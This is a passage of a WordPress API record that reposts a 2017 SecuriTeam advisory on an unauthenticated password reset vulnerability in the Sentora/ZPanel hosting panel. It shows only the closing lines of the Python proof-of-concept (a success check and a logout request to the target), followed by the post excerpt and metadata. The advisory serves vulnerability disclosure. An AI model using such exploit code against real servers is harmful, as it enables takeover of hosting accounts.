id=\"crayon-59c82f65ac99b844907907-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;OK&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/?logout&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0073 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3386\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 24 Sep 2017 07:58:32 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a password reset found in Sentora \/ ZPanel. Sentora is &#8220;a free to download and use web hosting control panel developed for Linux, UNIX and BSD based servers or computers. The Sentora software can turn a domestic or commercial server into a fully fledged, easy to use and manage &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3386\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Sentora \/ ZPanel Password Reset Vulnerability<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757,12136],"class_list":["post-9485","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9485","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9485"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9485\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9485"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9485"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9485"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}